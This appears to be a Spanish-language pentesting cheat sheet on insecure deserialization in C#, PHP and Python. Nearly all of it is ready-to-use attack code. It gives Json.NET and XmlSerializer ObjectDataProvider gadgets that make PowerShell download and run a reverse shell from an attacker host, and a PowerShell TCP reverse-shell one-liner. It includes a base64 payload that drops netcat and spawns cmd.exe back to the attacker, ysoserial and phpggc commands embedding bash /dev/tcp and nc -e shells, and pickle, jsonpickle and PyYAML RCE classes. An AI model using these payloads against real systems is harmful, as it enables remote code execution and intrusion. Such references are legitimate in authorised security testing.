Deserialization
C#
Json.NET
Gadget ObjectDataProvider (ejemplo 1)
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
"ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"MethodParameters": {
"$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
"$values": [
"powershell.exe",
"IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')"
]
},
"MethodName": "Start"
}
Gadget ObjectDataProvider (ejemplo 2)
{
"$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework",
"ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"MethodParameters": {
"$type": "MS.Internal.Data.ParameterCollection, PresentationFramework",
"$values": [
"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe",
"-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>"
]
},
"MethodName": "Start"
}
XmlSerializer
Gadget ObjectDataProvider (ejemplo 1)
<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ProjectedProperty0>
<ObjectInstance xsi:type="XamlReader" />
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xsi:type="xsd:string"><ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"><ObjectDataProvider.ObjectInstance><sd:Process><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="IEX(New-Object Net.WebClient).downloadString('http://<attacker-IP-address>:80/reverse-shell.ps1')" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="powershell.exe"></sd:ProcessStartInfo></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider></anyType>
</MethodParameters>
</ProjectedProperty0>
</Example>
Gadget ObjectDataProvider (ejemplo 2)
<?xml version="1.0"?>
<Example xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ProjectedProperty0>
<ObjectInstance xsi:type="XamlReader" />
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xsi:type="xsd:string"><ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"><ObjectDataProvider.ObjectInstance><sd:Process><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="-WindowStyle Hidden -NonInteractive -exec bypass -enc <base64-payload>" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"></sd:ProcessStartInfo></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider></anyType>
</MethodParameters>
</ProjectedProperty0>
</Example>
Type
System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
Reverse shell
Ejemplo 1
# Máquina atacante
## reverse shell (reverse-shell.ps1)
$client = New-Object System.Net.Sockets.TCPClient('<attacker-IP-address>',<listen-port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
## HTTP server
python3 -m http.server 80
## Netcat
nc -lvnp <listen-port>
Ejemplo 2
# Máquina atacante
## Descarga de netcat
wget https://raw.githubusercontent.com/MrW0l05zyn/pentesting/refs/heads/master/windows/shell/netcat/netcat-x64.exe
mv netcat-x64.exe nc.exe
## HTTP server
python3 -m http.server 80
## Generación de payload en base64
python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://<attacker-IP-address>:80/nc.exe", "c:\windows\tasks\nc.exe");c:\windows\tasks\nc.exe -nv <attacker-IP-address> <listen-port> -e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())'
## Netcat
nc -lvnp <listen-port>
Herramientas
YSoSerial.NET
# General
.\ysoserial.exe -f <formatter> -g <gadget> -c <payload> -o <output>
# Json.Net / Gadget ObjectDataProvider
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "<payload>" -o Raw
# XmlSerializer / Gadget ObjectDataProvider
.\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "<payload>" -o Raw
PHP
Herramientas
PHPGGC
Listar gadget chains disponibles.
phpggc -l
phpggc -l <framework>
Generar un payload utilizando un gadget chains específico.
phpggc <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -b
phpggc <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
Generar un archivo PHAR utilizando un gadget chains específico.
phpggc -p phar <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -o file.phar
phpggc -p phar <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
http://example.com/?file=uploads/file.txt
http://example.com/?file=phar://uploads/file.phar
Python
Pickle
import base64, pickle, os
class RCE:
def __reduce__(self):
payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
return os.system, (payload,)
print(base64.b64encode(pickle.dumps(RCE())).decode())
JSONPickle
import jsonpickle, os
class RCE:
def __reduce__(self):
payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
return os.system, (payload,)
print(jsonpickle.encode(RCE()))
PyYAML
import yaml, subprocess
class RCE:
def __reduce__(self):
return subprocess.Popen(["nc", "-nv", "<attacker-IP-address>", "<listen-port>", "-e", "/bin/bash"])
print(yaml.dump(RCE()))
Herramientas
PEAS
Última actualización
¿Te fue útil?